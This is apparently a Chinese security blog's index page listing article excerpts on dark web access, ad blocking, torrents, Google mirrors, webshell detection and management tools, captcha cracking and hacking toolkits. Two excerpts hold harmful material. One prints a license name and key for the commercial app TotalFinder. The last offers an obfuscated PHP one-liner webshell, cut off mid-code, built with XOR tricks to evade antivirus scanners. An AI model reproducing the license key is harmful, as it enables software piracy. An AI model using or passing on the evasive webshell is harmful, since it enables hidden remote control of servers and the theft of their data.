体验盒子

关注网络安全,网络安全博客

暗网是什么?如何进入暗网?

暗网是什么?如何进入暗网? 置顶

暗网是什么?暗网(英语:Dark web)是存在于黑暗网络、覆盖网络上的万维网内容,只能用特殊软件、特殊授权、或对计算机做特殊设置才能访问。一些灰色的非法网站将他们的资源联系到一起形成了一个庞大的网络...

手机广告过滤,手机广告拦截软件推荐

手机广告过滤,手机广告拦截软件推荐 置顶

这里主要讲的是手机浏览器网页广告过滤拦截软件,而不是手机APP广告拦截,为何?手机网页是应用内拦截,这是最常见的场景,这安全可控的;而APP广告拦截属于更底层的操作,Android安卓手机需要Root,IOS苹果手机...

手机BT/种子下载,手机磁力链下载软件整理

手机BT/种子下载,手机磁力链下载软件整理 置顶

已经在5G高速口了,如何用手机下载BT种子或磁力链?磁力链接:magnet:?xt=urn:btih:种子BT:.torrent本文收集整理了手机磁力链/种子/bt下载软件,在手机上也可以方便地下载磁力链接和种子了。为保证程序...

使用DNSCrypt选择最佳的DoH Resolver,解决DNS污染问题

使用DNSCrypt选择最佳的DoH Resolver,解决DNS污染问题 置顶

DNS劫持,DNS污染在国内很常见。除了用来屏蔽一些国外的网站,还有如劫持百度统计的域名。因为国内大多数网站都使用百度统计,而使用百度统计需要从百度的网站加载一段JavaScript。部分运营商通过DNS劫持,...

用uBlock Origin过滤广告,享受最好的广告拦截体验

用uBlock Origin过滤广告,享受最好的广告拦截体验 置顶

疯了!我要过滤广告这是一篇自黑文。现在几乎95%以上的网站都放有广告,更甚的是那些大网站大平台,一个页面有本事放几十个广告脚本,放文字图片广告就算了,关键他们还放视频广告啊……,忍无可忍了?下面这...

BT磁力搜索引擎大全

BT磁力搜索引擎大全 置顶

磁力搜索引擎BT 种子和磁力链接下载是现在下载资源的主要方式,由于版权等各种原因,磁力搜索引擎时常被和谐掉,因此网上流传的各种“磁力搜索引擎大全”中列举的诸多站点都不太稳定,2019年可用、好用、值得...

2019 Google镜像大全,谷歌镜像网址

2019 Google镜像大全,谷歌镜像网址 置顶

Google镜像/谷歌镜像过去几年,我们也分享过一些Google镜像网址,但这类资源一旦公开后都不太稳定,用的人多了就这样。下面是2019年亲测稳定可用的Google镜像网址。持续可用的谷歌镜像最新谷歌镜像...

7款WebShell扫描检测查杀工具

7款WebShell扫描检测查杀工具 置顶

webshell是一种可以在web服务器上执行后台脚本或者命令的后门,黑客通过入侵网站上传webshell后获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。而WebShe...

wafw00f – WEB防火墙(WAF)探测工具

wafw00f – WEB防火墙(WAF)探测工具 置顶

WAFW00FWAFW00F是一个Web应用防火墙(WAF)指纹识别的工具。WAFW00F工作原理是首先通过发送一个正常http请求,然后观察其返回有没有一些特征字符如果不成功,它将发送大量(潜在的恶意) HTTP 请...

中国蚁剑AntSword:开源的跨平台WebShell管理工具

中国蚁剑AntSword:开源的跨平台WebShell管理工具 置顶

中国蚁剑AntSword中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。是一款非常优秀的webshell管理工具。核心功能Shell代理功能Shell...

使用tensorflow卷积神经网络,进行字符型图片验证码识别

使用tensorflow卷积神经网络,进行字符型图片验证码识别

cnn_captcha 字符型图片验证码识别本项目针对字符型图片验证码,使用tensorflow实现卷积神经网络,进行验证码识别。项目封装了比较通用的校验、训练、验证、识别、API模块,极大的减少了识别字符型验证码花...

GitMiner:Github敏感信息泄露高级挖掘工具

GitMiner:Github敏感信息泄露高级挖掘工具

GitMiner介绍Github 中的自动化高级搜索工具。 这个工具的目的是通过搜索 github 上的代码或代码片段发现敏感信息泄露。证明公共存储库存储敏感信息代码的脆弱性。GitMiner github信息泄露扫描工具...

单机日志分析工具:logC

单机日志分析工具:logC

logC简介信息安全工作场景很多,这里针对个人的一个工作场景自制一个日志分析工具。在应急响应的时候如何从大量web日志中寻找和提取有用信息是我工作中所遇到的一个痛点。学习众多道友分享的文章后自己也做...

适用于Linux和Android的一体化黑客工具包:hacktronian

适用于Linux和Android的一体化黑客工具包:hacktronian

一个黑客所需的渗透测试黑客工具包,可运行于Linux和Android系统中。hacktronian黑客工具包HACKTRONIAN 菜单信息收集密码攻击无线测试开发工具嗅探和欺骗WEB黑客隐私网络黑客渗透利用安装HACKTRONIA...

SRC-script:挖掘src常用脚本收集

SRC-script:挖掘src常用脚本收集

SRC-script挖掘src常用脚本,用于渗透测试和信息收集中。其中一些脚本都是从九世的博客转过来的,还有一些就是感觉用起来比较顺手的工具。xcdn - 检测与绕过cdn百度收集器 - 收集百度关键字爆破攻击...

PEpper  – PE文件恶意软件静态分析的开源脚本

PEpper – PE文件恶意软件静态分析的开源脚本

PEpper PE文件分析一个开源的PE文件恶意分析脚本,用于对PE执行恶意软件静态分析。PE(Portable Executable)格式,是微软环境可移植可执行文件(如exe、dll、vxd、sys和vdm等)的标准文件格式。PEppe...

Android/IOS应用静态资源分析工具:truegaze,关注源代码之外的安全问题

Android/IOS应用静态资源分析工具:truegaze,关注源代码之外的安全问题

truegaze Android/IOS应用静态分析工具一个针对 Android 和 iOS 应用程序的静态分析工具,专注于源代码之外的安全问题,如资源字符串、第三方库和配置文件等。依赖Python 3是必需的,您可以在 r...

MySQL binlog太大,如何优化及清理/删除binlog

MySQL binlog太大,如何优化及清理/删除binlog

这是继上次写的《Nginx access.log文件太大,自动释放清理》的关联调优文章继续。今天同样有同学反馈图片加载速度稍慢,于是我又再次检查,然后查到了MySQL binlog是根源,作记录。查出binlog检查相关pi...

TotalFinder v1.11.7-8注册码

TotalFinder v1.11.7-8注册码

TotalFinder 注册码截止发稿前,最新版为v1.11.8License Name:Kevin KelleyLicense Key:GAWAE-FBZK3-X4M62-5L9UJ-JLGUL-A6LCG-MBLQT-S9HQC-CRN99-JC7GB-FRFDZ-WCDYZ-DFPRA-5LD2R-CLLM...

+免杀PHP一句话一枚

+免杀PHP一句话一枚

免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等<?php class VONE { function HALB() { $rlf = 'B' ^ "\x23"; $fzq = 'D' ^ "\x37"; $fgu = 'h' ^ "\x1b"; $sbe = 'R' ^ "\x37"; ...